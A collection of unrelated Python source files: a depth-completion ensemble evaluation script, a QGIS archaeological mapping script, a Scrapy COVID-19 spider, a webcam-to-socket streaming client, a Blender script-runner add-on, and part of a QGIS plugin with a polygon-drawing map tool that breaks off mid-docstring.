torch.zeros(means[0].size()).cuda() # (shape: (batch_size, 1, h, w)) (sigma_alea^2)\r\n for value in sigma_2_aleas:\r\n sigma_2_alea = sigma_2_alea + value/M\r\n\r\n sigma_2_epi = torch.zeros(means[0].size()).cuda() # (shape: (batch_size, 1, h, w)) (sigma_epi^2)\r\n for value in means:\r\n sigma_2_epi = sigma_2_epi + torch.pow(mean - value, 2)/M\r\n\r\n sigma_2_pred = sigma_2_alea + sigma_2_epi # (sigma_pred^2)\r\n\r\n loss = criterion(mean, torch.log(sigma_2_pred), targets)\r\n rmse = rmse_criterion(mean, targets)\r\n\r\n print('iter = {}/{} completed, loss = {}, rmse = {}'.format(i_iter, len(eval_dataset)/batch_size, loss.data.cpu().numpy(), rmse.data.cpu().numpy()))\r\n\r\n batch_losses.append(loss.data.cpu().numpy())\r\n batch_rmses.append(rmse.data.cpu().numpy())\r\n\r\n ########################################################################\r\n # visualization:\r\n ########################################################################\r\n mean = mean.data.cpu().numpy() # (shape: (batch_size, 1, h, w))\r\n sigma_2_alea = sigma_2_alea.data.cpu().numpy() # (shape: (batch_size, 1, h, w))\r\n sigma_2_epi = sigma_2_epi.data.cpu().numpy() # (shape: (batch_size, 1, h, w))\r\n sigma_2_pred = sigma_2_pred.data.cpu().numpy() # (shape: (batch_size, 1, h, w))\r\n targets = targets.data.cpu().numpy() # (shape: (batch_size, h, w))\r\n imgs = imgs.data.cpu().numpy() # (shape: (batch_size, h, w))\r\n sparses = sparses.data.cpu().numpy() # (shape: (batch_size, h, w))\r\n\r\n for i in range(mean.shape[0]):\r\n if i == 0:\r\n file_id = file_ids[i] # (file_id == \"0002/clone/00007.png\" (e.g.))\r\n file_id = file_id.split(\"/\")[-2] + \"_\" + file_id.split(\"/\")[-1] # (file_id == \"clone_00007.png\")\r\n file_id = file_id.split(\".png\")[0] # (file_id == \"clone_00007\")\r\n\r\n pred = mean[i] # (shape: (1, h, w))\r\n pred = pred.squeeze(0) # (shape: (h, w))\r\n\r\n sigma_2_alea_ = sigma_2_alea[i] # (shape: (1, h, w))\r\n sigma_2_alea_ = sigma_2_alea_.squeeze(0) # (shape: (h, w))\r\n sigma_alea = np.sqrt(sigma_2_alea_)\r\n\r\n sigma_2_epi_ = sigma_2_epi[i] # (shape: (1, h, w))\r\n sigma_2_epi_ = sigma_2_epi_.squeeze(0) # (shape: (h, w))\r\n sigma_epi = np.sqrt(sigma_2_epi_)\r\n\r\n sigma_2_pred_ = sigma_2_pred[i] # (shape: (1, h, w))\r\n sigma_2_pred_ = sigma_2_pred_.squeeze(0) # (shape: (h, w))\r\n sigma_pred = np.sqrt(sigma_2_pred_)\r\n\r\n img = imgs[i] # (shape: (h, w))\r\n img = img.astype(np.uint8)\r\n\r\n max_distance = 65.0\r\n\r\n target = targets[i] # (shape: (h, w))\r\n target[target > max_distance] = max_distance\r\n target = (target/max_distance)*255\r\n target = target.astype(np.uint8)\r\n\r\n sparse = sparses[i] # (shape: (h, w))\r\n sparse[sparse > max_distance] = max_distance\r\n sparse = (sparse/max_distance)*255\r\n sparse = sparse.astype(np.uint8)\r\n\r\n pred[pred > max_distance] = max_distance\r\n pred = (pred/max_distance)*255\r\n pred = pred.astype(np.uint8)\r\n\r\n sparse_color = cv2.applyColorMap(sparse, cv2.COLORMAP_SUMMER)\r\n sparse_color[sparse == 0] = 0\r\n\r\n target_color = cv2.applyColorMap(target, cv2.COLORMAP_SUMMER)\r\n target_color[target == 0] = 0\r\n\r\n pred_color = cv2.applyColorMap(pred, cv2.COLORMAP_SUMMER)\r\n\r\n max_interval_length = 75.0 # (corresponds to the maximum length of a 95% conf interval)\r\n max_sigma = max_interval_length/(2.0*1.96)\r\n\r\n sigma_alea[sigma_alea > max_sigma] = max_sigma\r\n sigma_alea = (sigma_alea/max_sigma)*255\r\n sigma_alea = sigma_alea.astype(np.uint8)\r\n sigma_alea_color = cv2.applyColorMap(sigma_alea, 
cv2.COLORMAP_HOT)\r\n\r\n sigma_epi[sigma_epi > max_sigma] = max_sigma\r\n sigma_epi = (sigma_epi/max_sigma)*255\r\n sigma_epi = sigma_epi.astype(np.uint8)\r\n sigma_epi_color = cv2.applyColorMap(sigma_epi, cv2.COLORMAP_HOT)\r\n\r\n sigma_pred[sigma_pred > max_sigma] = max_sigma\r\n sigma_pred = (sigma_pred/max_sigma)*255\r\n sigma_pred = sigma_pred.astype(np.uint8)\r\n sigma_pred_color = cv2.applyColorMap(sigma_pred, cv2.COLORMAP_HOT)\r\n\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_img.png\", img)\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_sparse_color.png\", sparse_color)\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_target_color.png\", target_color)\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_pred_color.png\", pred_color)\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_sigma_alea_color.png\", sigma_alea_color)\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_sigma_epi_color.png\", sigma_epi_color)\r\n cv2.imwrite(snapshot_dir + \"/\" + file_id + \"_sigma_pred_color.png\", sigma_pred_color)\r\n\r\n # # # # # # # # # # # # # # # # # # debug START:\r\n # if i_iter > 0:\r\n # break\r\n # # # # # # # # # # # # # # # # # # debug END:\r\n\r\nval_loss = np.mean(batch_losses)\r\nprint (\"val loss: %g\" % val_loss)\r\nval_rmse = np.mean(batch_rmses)\r\nprint (\"val rmse: %g\" % val_rmse)\r\n","sub_path":"depthCompletion/ensembling_eval_virtual.py","file_name":"ensembling_eval_virtual.py","file_ext":"py","file_size_in_byte":7954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"412198876","text":"import os # library used to manipulate path names and directories\r\nimport glob # allows for all files in a certain directory to be targeted\r\nimport fnmatch\r\nfrom qgis.core import (QgsFeature, QgsField, QgsFields,\r\n QgsGeometry, QgsPoint, QgsVectorFileWriter)\r\n\r\n\r\nproject = QgsProject.instance()\r\n\r\nprehistoric_data= \"file:///C:/Users/ADMIN/Desktop/Data/Site_type/prehistoric_data.csv\"\r\n \r\narchaeo_search_terms = ['Broch', 'Bank', 'Building', 'Burnt Mound', 'Dyke', 'Cairnfield', 'Clearence Cairn', \r\n'Chambered Cairn', 'Kerb Cairn', 'Burial Cairn', 'Dun', 'Enclosure', 'Field Boundary', 'Field System', \r\n'House', 'Hut Circle', 'Lithic Working Site', 'Long Cairn', 'Quarry', 'Ritual Building', 'Souterrain', \r\n'Standing Stone', 'Stone Heap', 'Stone Row', 'Stone Setting', 'Settlement (Prehistoric)', \r\n'Settlement (Neolithic)', 'Settlement (Bronze Age)', 'Settlement (Iron Age)', 'Wall']\r\n\r\nlayer_colours = [ '#1f78b4', '#a6cee3', '#b2df8a', '#33a02c', '#fb9a99', '#e31a1c', '#fdbf6f', '#ff7f00', \r\n'#00fffb', '#f7ff00', '#ff00d9', '#4000ff', '#ff0c00', '#713a48', '#71ee48', '#cdee48', '#ee48c2', '#ee4803', \r\n'#e3bbee', '#3a7141', '#82a11c', '#82a1f1', '#f19e82', '#0928f1', '#c44f6a', '#4fc461', '#08160a', '#b430c2', \r\n'#9bc230', '#ff9a3c']\r\n\r\nlayer_shapes = [ 'circle', 'square', 'triangle', 'diamond', 'circle', 'square', 'triangle', 'diamond', 'circle', \r\n'square', 'triangle', 'diamond', 'circle', 'square', 'triangle', 'diamond', 'circle', 'square', 'triangle', 'diamond', \r\n'circle', 'square', 'triangle', 'diamond', 'circle', 'square', 'triangle', 'diamond', 'circle', 'square']\r\n\r\n# this line purges the layers panel to stop it becoming clutered\r\nproject.removeAllMapLayers()\r\n\r\n# this empties the directory geoprogramming, just for housekeeping\r\nfiles = glob.glob('C:/Users/ADMIN/Desktop/Data/geoprogramming/*')\r\nfor f in files:\r\n os.remove(f)\r\n\r\n# the outline of 
the island the points fall within, the context for the map (this could be a raster)\r\ncontour_map = QgsVectorLayer(\"C:/Users/ADMIN/Desktop/Data/Site_type/shapefiles/Unst50metre.shp\", \"Unst contours\", \"ogr\")\r\n# this routine merely validates the shp file entry\r\nif not contour_map.isValid():\r\n    print(\"Layer failed to load!\")\r\n\r\nreproj_contour_map = processing.run('native:reprojectlayer', {'INPUT': contour_map,\r\n                              'TARGET_CRS': 'EPSG:4326',\r\n                              'OUTPUT': 'memory:'})['OUTPUT']\r\n\r\n# these next two blocks of code rename the output layers in the table of contents\r\nproject.addMapLayer(reproj_contour_map)\r\nto_be_renamed = project.mapLayersByName('output')[0]\r\nto_be_renamed.setName('Contour_map')\r\n\r\n# this line sets the uri, the information about the crs and encoding\r\nuri = prehistoric_data + \"?encoding=%s&delimiter=%s&xField=%s&yField=%s&crs=%s\" % (\"UTF-8\",\",\", \"SITE EASTING\", \"SITE NORTHING\",\"epsg:27700\")\r\npre_hist_data = QgsVectorLayer(uri,'Points', 'delimitedtext')\r\nprint(pre_hist_data.isValid())\r\n# this adds the layer to the map, for some reason it has to be added, even though it is an intermediate step, it is deleted later\r\npre_hist_data = iface.addVectorLayer(uri,'Brochs','delimitedtext')\r\n\r\n# this processing call reprojects the layer into epsg 4326, now all layers are in the same projection\r\nreproj_pre_hist_data = processing.run('native:reprojectlayer', {'INPUT': pre_hist_data,\r\n                              'TARGET_CRS': 'EPSG:4326',\r\n                              'OUTPUT': 'memory:'})['OUTPUT']\r\n \r\n\r\n# the reprojection is added\r\nproject.addMapLayer(reproj_pre_hist_data)\r\n# the reprojection is renamed\r\nto_be_renamed = project.mapLayersByName('output')[0]\r\nto_be_renamed.setName('Prehistoric_data')\r\n\r\n#just to check what is in the table of contents, the layer names are printed to the console\r\nlayers_names = []\r\nfor layer in QgsProject.instance().mapLayers().values():\r\n    layers_names.append(layer.name())\r\n\r\nprint(\"layers TOC = {}\".format(layers_names))\r\n\r\n# the target layer that will be divided, or selected, by the search terms is defined\r\nlayer = reproj_pre_hist_data\r\n\r\nfor index, item in enumerate(archaeo_search_terms):\r\n    \r\n    # the LIKE operator acts like the word contains, the % signs are wildcards so allow the term to appear anywhere\r\n    # by using formatting a variable can be used as the search term\r\n    layer.selectByExpression('\"SITE TYPE\" LIKE \\'%{}%\\''.format(item),QgsVectorLayer.SetSelection)\r\n\r\n    selection = layer.selectedFeatures()\r\n\r\n    #if there is any information in the selection, create a geopackage and write the vector to the map\r\n    if (len(selection) > 0):\r\n        file_name = 'C:/Users/ADMIN/Desktop/Data/geoprogramming/{}.gpkg'.format(item)\r\n        writer = QgsVectorFileWriter.writeAsVectorFormat(layer, file_name, 'utf-8', driverName = 'GPKG', onlySelected = True)\r\n        \r\n        selected_layer = iface.addVectorLayer(file_name, item, 'ogr')\r\n        \r\n        # these two lines take the symbol and colour at the relevant spot and apply them to the layer\r\n        symbol = QgsMarkerSymbol.createSimple({'name': layer_shapes[index], 'color': layer_colours[index]})\r\n        selected_layer.renderer().setSymbol(symbol)\r\n        # make the change actual for the layer\r\n        selected_layer.triggerRepaint()\r\n        \r\n        #this line updates the layer tree symbology as each layer's symbols are changed\r\n        iface.layerTreeView().refreshLayerSymbology( iface.activeLayer().id() )\r\n        \r\n        project.addMapLayer(selected_layer)\r\n        
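# deleting the writer object flushes the written features and closes the GeoPackage file\r\n        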
del(writer)\r\n\r\nQCoreApplication.processEvents()\r\n\r\n# these lines clear the table of contents of unnecessary layers\r\nroot = project.layerTreeRoot()\r\n\r\nroot.removeLayer(reproj_pre_hist_data)\r\nroot.removeLayer(pre_hist_data)\r\n\r\n\r\n##############################################\r\n#this part of the script creates a map from the results of the foregoing part of the script\r\n#############################################################\r\n\r\nproject = QgsProject.instance() \r\nmanager = project.layoutManager()\r\nlayout = QgsPrintLayout(project) \r\nlayoutName = \"PrintLayout\"\r\nlayout.setName('Prehistoric archaeology on Unst, Shetland, Scotland') \r\n\r\nlayouts_list = manager.printLayouts()\r\n\r\nfor layout in layouts_list:\r\n if layout.name() == layoutName:\r\n manager.removeLayout(layout)\r\n\r\nlayout = QgsPrintLayout(project)\r\nlayout.initializeDefaults() #create default map canvas\r\nlayout.setName(layoutName)\r\nmanager.addLayout(layout)\r\n\r\n\r\n\r\n# Map\r\n# Defaults of `A4`, `Landscape`, & `LayoutMillimeters` are \r\n# due to `layout.initializeDefaults()`\r\nmap = QgsLayoutItemMap(layout)\r\nmap.setRect(QRectF(20, 20, 200, 100)) # The Rectangle will be overridden below\r\n\r\n\r\n# sets the extent to the extent of the named layer\r\nmap.setExtent(reproj_contour_map.extent())\r\n\r\n\r\nlayout.addLayoutItem(map)\r\n\r\n#Move & Resize\r\nmap.attemptMove(QgsLayoutPoint(15, 35, QgsUnitTypes.LayoutMillimeters))\r\nmap.attemptResize(QgsLayoutSize(200, 160, QgsUnitTypes.LayoutMillimeters))\r\n\r\n#Checks layer tree objects and stores them in a list. This includes csv tables\r\nchecked_layers = [layer.name() for layer in QgsProject().instance().layerTreeRoot().children() if layer.isVisible()]\r\nprint(f\"Adding {checked_layers} to legend.\" )\r\n#get map layer objects of checked layers by matching their names and store those in a list\r\nlayersToAdd = [layer for layer in QgsProject().instance().mapLayers().values() if layer.name() in checked_layers]\r\nroot = QgsLayerTree()\r\nfor layer in layersToAdd:\r\n #add layer objects to the layer tree\r\n root.addLayer(layer)\r\n\r\n\r\n\r\nlegend = QgsLayoutItemLegend(layout)\r\nlegend.model().setRootGroup(root)\r\nlayout.addLayoutItem(legend)\r\nlegend.attemptMove(QgsLayoutPoint(240, 35, QgsUnitTypes.LayoutMillimeters))\r\n\r\ntitle = QgsLayoutItemLabel(layout)\r\ntitle.setText(\"Prehistoric archaeological sites on Unst, Shetland, Scotland\")\r\ntitle.setFont(QFont(\"Arial\", 28))\r\ntitle.adjustSizeToText()\r\nlayout.addLayoutItem(title)\r\ntitle.attemptMove(QgsLayoutPoint(10, 4, QgsUnitTypes.LayoutMillimeters))\r\n\r\nsubtitle = QgsLayoutItemLabel(layout)\r\nsubtitle.setText(\"Archaeological data courtesy of the CANMORE repository\")\r\nsubtitle.setFont(QFont(\"Arial\", 17))\r\nsubtitle.adjustSizeToText()\r\nlayout.addLayoutItem(subtitle)\r\nsubtitle.attemptMove(QgsLayoutPoint(11, 20, QgsUnitTypes.LayoutMillimeters)) #allows moving text box\r\n\r\ncredit_text = QgsLayoutItemLabel(layout)\r\ncredit_text.setText(\"Map created by A. 
Prentice 2019\")\r\ncredit_text.setFont(QFont(\"Arial\", 10))\r\ncredit_text.adjustSizeToText()\r\nlayout.addLayoutItem(credit_text)\r\ncredit_text.attemptMove(QgsLayoutPoint(225, 185, QgsUnitTypes.LayoutMillimeters))\r\n\r\n# add scalebar\r\nscaleBar = QgsLayoutItemScaleBar(layout)\r\nscaleBar.setLinkedMap(map)\r\nscaleBar.applyDefaultSettings()\r\nscaleBar.applyDefaultSize()\r\n# scaleBar.setStyle('Line Ticks Down') \r\nscaleBar.setNumberOfSegmentsLeft(0)\r\nscaleBar.setNumberOfSegments(3)\r\n\r\nscaleBar.setPos(225, 165)\r\nscaleBar.update()\r\n\r\nlayout.addItem(scaleBar)\r\n\r\n#Add north arrow\r\narrow = QgsLayoutItemPicture(layout)\r\narrow.setPicturePath(\"C:/OSGeo4W64/apps/qgis/svg/arrows/NorthArrow_04.svg\")\r\narrow.setLinkedMap(map)\r\narrow.attemptMove(QgsLayoutPoint(225, 135, QgsUnitTypes.LayoutMillimeters))\r\narrow.attemptResize(QgsLayoutSize(20, 20, QgsUnitTypes.LayoutMillimeters))\r\nlayout.addItem(arrow)\r\n\r\n# this exports the map as a PDF\r\nQgsLayoutExporter(layout).exportToPdf( 'C:/Users/ADMIN/Desktop/Data/geoprogramming/archaeo_sites.pdf', QgsLayoutExporter.PdfExportSettings() )\r\n# this exports the map as an image\r\nQgsLayoutExporter(layout).exportToImage('C:/Users/ADMIN/Desktop/Data/geoprogramming/archaeo_sites.png', QgsLayoutExporter.ImageExportSettings())","sub_path":"map_creation.py","file_name":"map_creation.py","file_ext":"py","file_size_in_byte":9588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"414405658","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom covid19.items import TestingStats\nfrom datetime import datetime as dt\nimport logging\n\n# Deprecated: No longer reporting negative tests.\nclass FloridaSpider(scrapy.Spider):\n    name = 'florida'\n    allowed_domains = ['http://www.floridahealth.gov/']\n    names = [\"Florida State\"]\n    case_categories = [\"positive\", \"negative\", \"pending\", \"pui\"]\n    custom_settings = {\"LOG_LEVEL\" : logging.ERROR }\n\n    def start_requests( self ):\n        yield scrapy.Request( \"http://www.floridahealth.gov/diseases-and-conditions/COVID-19/\", callback=self.parse )\n\n    def parse(self, response):\n        item = TestingStats()\n\n        #date = response.xpath( '/html/body/div[1]/div[3]/div/div[2]/div[3]/div/div[1]/block/p[1]/sup/text()' ).get()\n        date = response.xpath( '/html/body/div[2]/div/div/div[3]/div[1]/p/text()' ).get()\n        date = date.replace( \".\", \"\" ).split( \"of \" )[-1]\n        date = dt.strptime( date, \"%I:%M %p ET %m/%d/%Y\")\n\n        positive = response.xpath( '/html/body/div[2]/div/div/div[3]/div[2]/div[1]/div/div[1]/h2/text()' ).get()\n        positive = positive.split( \" \" )[0]\n\n        negative = response.xpath( '/html/body/div[1]/div[3]/div/div[2]/div[3]/div/div[1]/block/div[5]/text()' ).get()\n\n        pending = response.xpath( '/html/body/div[1]/div[3]/div/div[2]/div[3]/div/div[1]/block/div[6]/text()' ).get()\n\n        # deaths is scraped here but not yet stored on the item\n        deaths = response.xpath( '/html/body/div[2]/div/div/div[3]/div[4]/div/table/tbody/tr[2]/td[2]/text()' ).get()\n\n        item[\"date\"] = date.strftime(\"%Y-%m-%d %H:%M %p\")\n        item[\"name\"] = \"Florida\"\n        item[\"positive\"] = positive\n        item[\"pending\"] = pending\n        item[\"negative\"] = negative\n\n        print( item.toAsciiTable() )\n        return item\n\n","sub_path":"covid19/spiders/usa/florida.py","file_name":"florida.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
{"seq_id":"53061428","text":"import cv2\nimport numpy as np\nimport socket\nimport struct\nfrom io import BytesIO\nfrom datetime import datetime\n\n# Capture 
frame\ncap = cv2.VideoCapture(0)\n\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient_socket.connect(('10.0.0.220', 8080))\n\nprint(\"connected\")\n\nsend_delta = 1/30\nlast_sent = datetime.now()\nwhile cap.isOpened():\n if (datetime.now() - last_sent).total_seconds() > send_delta:\n _, frame = cap.read()\n\n target_w = 400\n target_h = target_w // 16 * 10\n frame = cv2.resize(frame, (target_w, target_h))\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n memfile = BytesIO()\n np.savez_compressed(memfile, frame=frame)\n memfile.seek(0)\n data = memfile.read()\n\n last_sent = datetime.now()\n # Send form byte array: frame size + frame content\n client_socket.sendall(struct.pack(\"L\", len(data)) + data)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"503701064","text":"\nbl_info = {\n \"name\": \"BpyList\",\n \"description\": \"bpylist\",\n \"author\": \"solpie\",\n \"version\": (0, 0, 2),\n \"blender\": (2, 80, 0),\n \"location\": \"View 3D > Header\",\n # \"wiki_url\": \"http://docs.retopoflow.com\",\n \"category\": \"3D View\"\n}\nimport bpy\nfrom bpy.types import Menu, Operator, Panel,UIList\nfrom bpy.props import StringProperty, IntProperty, BoolProperty\nimport os\n\nclass BpyList_Prefs(bpy.types.AddonPreferences):\n bl_idname = __package__\n bpypath = StringProperty(\n name=\"tmp path\",\n default='F:\\\\projects\\\\BlendExec\\\\bpy_scripts',\n description=\"tmp bpy.py write path\",\n )\n\n def draw(self, context):\n layout = self.layout\n layout.label(text=\"set bpy dir\")\n layout.prop(self, \"bpypath\")\n # layout.label(text=\"set port\")\n # layout.prop(self, \"port\")\n\nclass BpyList_Refresh(Operator):\n bl_idname = 'bpylist.refresh'\n bl_label = 'open bpylist dir'\n bl_description = 'refresh bpylist dir add to list'\n\n def execute(self, context):\n addon_prefs = context.preferences.addons[__package__].preferences\n tmp_path = addon_prefs.bpypath\n os.system('explorer ' + tmp_path)\n unregister()\n register()\n return {'PASS_THROUGH'}\n\nclass BpyList_Run(Operator):\n bl_idname = 'bpylist.run'\n bl_label = 'run'\n bl_description = 'run bpyscript'\n filename = bpy.props.StringProperty(default='')\n def execute(self, context):\n print(self.filename)\n bpypath = self.filename\n with open(bpypath, 'r+') as f:\n bpy_text = f.read()\n print('BlenCall')\n if '#[as_module]' in bpy_text:\n print('as_module')\n if len(bpy_text):\n if 'exec' not in bpy.data.texts:\n bpy.data.texts.new('exec')\n bpy.data.texts['exec'].from_string(bpy_text)\n bpy.data.texts['exec'].as_module()\n bpy.data.texts['exec'].from_string('')\n else:\n print('no bpy')\n else:\n print('exec compile')\n exec(compile(bpy_text, '', 'exec'))\n pass\n f.close()\n return {'FINISHED'}\n\nclass BL_UL_list(UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n layout.label(text=item.name,icon='WORLD_DATA')\n # if item.name == context.scene.world.name:\n # layout.label(text='',icon='CHECKBOX_HLT')\n # layout.operator('bp_world.delete_world',icon='X',text=\"\",emboss=False).world_name = item.name\n\nclass VIEW3D_PT_BpyList(Panel):\n \"\"\"BpyList Blender Menu\"\"\"\n bl_label = \"BpyList\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'HEADER'\n\n @staticmethod\n def is_editing_target(context):\n obj = context.active_object\n mode_string = 
context.mode\n edit_object = context.edit_object\n gp_edit = obj and obj.mode in {'EDIT_GPENCIL', 'PAINT_GPENCIL', 'SCULPT_GPENCIL', 'WEIGHT_GPENCIL'}\n return not gp_edit and edit_object and mode_string == 'EDIT_MESH'\n\n def draw(self, context):\n layout = self.layout\n layout.label(text='BpyList')\n addon_prefs = context.preferences.addons[__package__].preferences\n location = addon_prefs.bpypath\n # r=>root, d=>directories, f=>files\n i = 0\n box = layout.box()\n for r, d, f in os.walk(location):\n for item in f:\n if '.py' in item:\n filename_1 = os.path.join(r, item)\n with open(filename_1, 'r+') as f:\n line_1 = f.readline()\n f.close()\n if '#[as_exec]' not in line_1 and '#[as_module]' not in line_1:\n continue\n i += 1\n # files_in_dir.append({\"name\":item,\"path\":os.path.join(r, item),\"idx\":i})\n row = box.row()\n op = row.operator('bpylist.run',text=\"\",icon='RADIOBUT_ON')\n op.filename = os.path.join(r, item)\n row.label(text=item)\n # layout.label(text=\"\",icon=sel_icon)\n # layout.template_list(\"BP_UL_worlds\", \"\", bpy.data, \"worlds\", scene.bp_props, \"selected_world_index\", rows=4)\n # layout.template_list(\"BL_UL_list\", \"\", files_in_dir,'name',rows=4)\n\n layout.separator()\n layout.label(text='BpyList Updater')\n col = layout.column()\n col.operator('bpylist.refresh')\n\n #############################################################################\n # the following two methods add/remove RF to/from the main 3D View menu\n # NOTE: this is a total hack: hijacked the draw function!\n @staticmethod\n def menu_add():\n # for more icon options, see:\n # https://docs.blender.org/api/current/bpy.types.UILayout.html#bpy.types.UILayout.operator\n VIEW3D_PT_BpyList.menu_remove()\n VIEW3D_PT_BpyList._menu_original = bpy.types.VIEW3D_MT_editor_menus.draw_collapsible\n def hijacked(context, layout):\n obj = context.active_object\n mode_string = context.mode\n edit_object = context.edit_object\n gp_edit = obj and obj.mode in {'EDIT_GPENCIL', 'PAINT_GPENCIL', 'SCULPT_GPENCIL', 'WEIGHT_GPENCIL'}\n\n VIEW3D_PT_BpyList._menu_original(context, layout)\n\n row = layout.row(align=True)\n row.popover(panel=\"VIEW3D_PT_BpyList\", text=\"BpyList\")\n row.operator('bpylist.refresh', text=\"\", icon='QUESTION')\n bpy.types.VIEW3D_MT_editor_menus.draw_collapsible = hijacked\n @staticmethod\n def menu_remove():\n if not hasattr(VIEW3D_PT_BpyList, '_menu_original'): return\n bpy.types.VIEW3D_MT_editor_menus.draw_collapsible = VIEW3D_PT_BpyList._menu_original\n del VIEW3D_PT_BpyList._menu_original\n\n# registration\nclasses = [\n VIEW3D_PT_BpyList,\n BpyList_Prefs,\n BpyList_Refresh,\n BL_UL_list,\n BpyList_Run,\n] \n\ndef register():\n for cls in classes: bpy.utils.register_class(cls)\n VIEW3D_PT_BpyList.menu_add()\n\ndef unregister():\n VIEW3D_PT_BpyList.menu_remove()\n for cls in reversed(classes): bpy.utils.unregister_class(cls)\n\nif __name__ == \"__main__\":\n register()\n","sub_path":"addons/BpyList/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"245071268","text":"from flask import Blueprint\n\nfrom ..logs.models import Level\n\n\nmain = Blueprint('main', __name__)\n\n\n@main.app_context_processor\ndef inject_levels():\n def create_level(level):\n if level & Level.DEBUG:\n return 'info'\n elif level & Level.INFO:\n return 'success'\n elif level & Level.WARNING:\n return 'warning'\n elif level & Level.ERROR:\n return 'danger'\n elif level & 
Level.CRITICAL:\n return 'danger'\n return dict(create_level=create_level)\n\n\nfrom . import views, errors","sub_path":"app/main/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"374446567","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/***************************************************************************\n VigourmapsDialog\n A QGIS plugin\n This plugin allows to obtain the biomass in rocky beach\n Generated by Plugin Builder: http://g-sherman.github.io/Qgis-Plugin-Builder/\n -------------------\n begin : 2020-09-23\n git sha : $Format:%H$\n copyright : (C) 2020 by Projeto SWAV\n email : liaduarte@fc.up.pt\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n\"\"\"\n\nimport os\n\nfrom qgis.PyQt import uic\nfrom qgis.PyQt import QtWidgets\nfrom qgis.core import *\nfrom qgis.gui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom qgis.core import *\nfrom qgis.utils import *\nfrom qgis.core import Qgis\n\n# This loads your .ui file so that PyQt can populate your plugin with the elements from Qt Designer\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\n os.path.dirname(__file__), 'vigour_maps_dialog_base.ui'))\n\n\nclass VigourMapsDialog(QtWidgets.QDialog, FORM_CLASS):\n def __init__(self, parent=None):\n \"\"\"Constructor.\"\"\"\n super(VigourMapsDialog, self).__init__(parent)\n # Set up the user interface from Designer through FORM_CLASS.\n # After self.setupUi() you can access any designer object by doing\n # self., and you can use autoconnect slots - see\n # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html\n # #widgets-and-dialogs-with-auto-connect\n self.setupUi(self)\n self.widget.show()\n self.widget.setCanvasColor(Qt.white)\n self.widget.enableAntiAliasing(True)\n\n\nclass RectangleMapTool(QgsMapToolEmitPoint):\n rect_created = pyqtSignal(QgsRectangle)\n def __init__(self, canvas):\n self.canvas = canvas\n QgsMapToolEmitPoint.__init__(self, self.canvas)\n self.rubberBand = QgsRubberBand(self.canvas, True)\n self.rubberBand.setColor(Qt.red)\n self.rubberBand.setWidth(1)\n\n self.points = []\n self.finished = False\n self.poly_bbox = False\n self.double_click_flag = False\n\n\n self.reset()\n\n def reset(self):\n #self.startPoint = self.endPoint = None\n #self.isEmittingPoint = False\n self.rubberBand.reset(True)\n self.poly_bbox = False\n self.points.clear()\n\n #new\n def keyPressEvent(self,e):\n #pressing escape resets the canvas. 
pressing enter connects the polygon\n if (e.key()==16777216):\n self.reset()\n if (e.key()==16777220):\n self.finishPolygon()\n\n #new\n def canvasDoubleClickEvent(self,e):\n #finishes the polygon on double click\n self.double_click_flag = True\n self.finishPolygon()\n\n # def canvasPressEvent(self, e):\n # self.startPoint = self.toMapCoordinates(e.pos())\n # self.endPoint = self.startPoint\n # self.isEmittingPoint = True\n # self.showRect(self.startPoint, self.endPoint)\n\n def canvasReleaseEvent(self, e):\n #activated when user clicks on the canvas. gets coordinates, draws them on the map and adds to the list of points\n if self.double_click_flag:\n self.double_click_flag = False\n return\n\n #if the finished flag is activated, the canvas will be reset for a new polygon\n if self.finished:\n self.reset()\n self.finished = False\n\n self.click_point = self.toMapCoordinates(e.pos())\n\n self.rubberBand.addPoint(self.click_point, True)\n self.points.append(self.click_point)\n self.rubberBand.show()\n\n def finishPolygon(self):\n # Activated by user or when the map window is closed without connecting\n # the polygon. Makes the polygon valid by making first and last point\n # the same. This is reflected visually. Up until now the user has been\n # drawing a line: a polygon is created and shown on the map\n # nothing will happen if the code below has already been ran\n if self.finished:\n return\n\n # connecting the polygon is valid if there's already at least 3 points\n elif len(self.points)>2:\n first_point = self.points[0]\n self.points.append(first_point)\n self.rubberBand.closePoints()\n self.rubberBand.addPoint(first_point, True)\n self.finished = True\n # a polygon is created and added to the map for visual purposes\n map_polygon = QgsGeometry.fromPolygonXY([self.points])\n self.rubberBand.setToGeometry(map_polygon)\n # get the bounding box of this new polygon\n self.poly_bbox = self.rubberBand.asGeometry().boundingBox()\n else:\n self.finished = True\n\n def getPoints(self):\n # Returns list of PointXY geometries, i.e. 
